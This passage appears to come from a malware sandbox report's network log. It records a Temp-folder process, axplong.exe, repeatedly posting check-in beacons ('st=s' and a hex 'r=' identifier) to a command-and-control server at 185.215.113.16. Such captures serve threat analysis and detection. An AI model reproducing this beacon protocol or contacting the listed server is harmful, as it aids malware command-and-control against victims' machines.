Sep 27, 2024 00:20:14.466130972 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:15.243591070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:15.244508028 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:15.468004942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:15.621543884 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:16.312407970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:16.313494921 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:16.678626060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:16.797324896 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:17.503345966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:17.504219055 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:17.765189886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:17.888951063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:18.608196974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:18.609127045 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:18.838968992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:18.949496984 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:19.690799952 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:19.691633940 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:19.919317007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49738	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:20.031224012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:20.777443886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:20.778523922 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:21.021801949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49740	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:21.144756079 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:21.856066942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:21.856957912 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:22.085535049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49743	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:22.201955080 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:22.902400017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:22.903342009 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:23.129972935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:23.250250101 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:23.949552059 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:23.957696915 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:24.185142040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:24.298501015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:25.120635033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:25.121757984 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:25.384674072 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:25.498446941 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:26.198019028 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:26.199155092 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:26.426377058 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:26.546650887 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:27.264488935 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 00:20:27.265553951 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 00:20:27.491336107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	185.215.113.16	80	1220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:20:27.605814934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 00:20:28.299740076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 22:20:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
